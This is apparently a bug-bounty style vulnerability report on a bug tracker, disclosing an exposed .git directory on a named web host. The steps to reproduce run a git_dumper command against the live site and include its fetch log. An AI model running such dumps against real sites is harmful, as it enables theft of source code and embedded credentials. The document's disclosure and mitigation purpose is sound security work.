Security vulnerabilities

Attached to Project: Security vulnerabilities
Opened by miniohaxer - 26.03.2024
Last edited by hdegorce - 27.03.2024

Vulnerability Git Configuration Exposure

Severity Level Critical

Vulnerable Domain:
https://upload.alwaysdata.com/.git/config

1. Executive Summary: The Git Configuration Exposure vulnerability poses a significant threat to web applications, allowing unauthorized access to sensitive source code repositories. Through the discovery of exposed .git/ directories, attackers can leverage this information to extract the complete source code of a website. This breach can result in the unauthorized disclosure of sensitive information, including proprietary code, configuration files, and other critical assets. This executive summary outlines the discovery, impact, and recommended mitigation strategies for this vulnerability.

2. Overview The vulnerability arises when an attacker identifies the presence of a .git/config directory. This discovery provides a direct route to the Git repository of a web application. By employing specialized tools such as those available in Kali Linux, an attacker can download the entire source code of the website, gaining access to proprietary code, scripts, and configuration files. The consequences of this exposure extend beyond the compromise of intellectual property to potential security risks and the unauthorized retrieval of sensitive information.

3. Vulnerability Discovery The vulnerability is discovered through directory research, where the presence of a .git/config directory is identified. Attempts to access this directory reveal the underlying Git repository, providing a pathway for unauthorized individuals to exploit the exposed version control system.

4. Impact Unauthorized Access to Source Code: Attackers can download the complete source code of the website, enabling the extraction of proprietary code, scripts, and configuration files.
Intellectual Property Theft: The compromise of source code poses a significant risk of intellectual property theft, potentially leading to unauthorized use or distribution.
Sensitive Information Exposure: The extracted source code may contain sensitive information, such as API keys, database credentials, and other critical data, compromising the overall security of the web application.

5. Mitigation Strategies

Git Configuration Hardening: Implement strict access controls and configure Git repositories to restrict access to authorized personnel only.
Directory Listing Prevention: Disable directory listing to prevent the exposure of .git directories during web server configuration.
Git Repository Hosting Security: If using third-party Git repository hosting services, ensure proper access controls are in place, and sensitive information is not exposed.

6. Steps To Reproduce:

1- Visit this URL = https://upload.alwaysdata.com/.git/config 2- You can see the Config file.
3- Using the gitdumper tool, in which I was able to dump the whole .git directory.
4- Boom!! I have access to the whole source code of the application.
4- Command
–> ./git_dumper.py https://upload.alwaysdata.com/.git/ your/any/directory/of/kali

Important Note: Another thing I'd like to share with you is that I haven't extensively exploited this vulnerability. Otherwise, I could have easily downloaded the entire website's source code, which often contains many and many sensitive information.

Proof of concept As you can see that I am able to access the entire source code. Now, if I put the output command to my command, I can download the whole source code.

[-] Testing https://upload.alwaysdata.com/.git/HEAD [200]
[-] Testing https://upload.alwaysdata.com/.git/ [403]
[-] Fetching common files
[-] Fetching https://upload.alwaysdata.com/.git/hooks/commit-msg.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/hooks/pre-commit.sample [200]
[-] Fetching https://upload.alwaysdata.com/.gitignore [200]
[-] Fetching https://upload.alwaysdata.com/.git/hooks/applypatch-msg.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/COMMIT_EDITMSG [404]
[-] https://upload.alwaysdata.com/.git/COMMIT_EDITMSG responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/hooks/post-commit.sample [404]
[-] https://upload.alwaysdata.com/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/hooks/pre-push.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/hooks/pre-rebase.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/hooks/pre-receive.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/index [200]
[-] Fetching https://upload.alwaysdata.com/.git/info/exclude [200]
[-] Fetching https://upload.alwaysdata.com/.git/objects/info/packs [404]
[-] https://upload.alwaysdata.com/.git/objects/info/packs responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/hooks/update.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/hooks/post-receive.sample [404]
[-] https://upload.alwaysdata.com/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/hooks/post-update.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/hooks/pre-applypatch.sample [200]
[-] Fetching https://upload.alwaysdata.com/.git/description [200]
[-] Finding refs/
[-] Fetching https://upload.alwaysdata.com/.git/info/refs [404]
[-] https://upload.alwaysdata.com/.git/info/refs responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/ORIG_HEAD [404]
[-] Fetching https://upload.alwaysdata.com/.git/config [200]
[-] https://upload.alwaysdata.com/.git/ORIG_HEAD responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/FETCH_HEAD [404]
[-] https://upload.alwaysdata.com/.git/FETCH_HEAD responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/logs/HEAD [200]
[-] Fetching https://upload.alwaysdata.com/.git/packed-refs [200]
[-] Fetching https://upload.alwaysdata.com/.git/refs/heads/master [200]
[-] Fetching https://upload.alwaysdata.com/.git/refs/remotes/origin/master [404]
[-] https://upload.alwaysdata.com/.git/refs/remotes/origin/master responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/refs/stash [404]
[-] https://upload.alwaysdata.com/.git/refs/stash responded with status code 404
[-] Fetching https://upload.alwaysdata.com/.git/refs/remotes/origin/HEAD [200]
Many More File will be Fatched…..!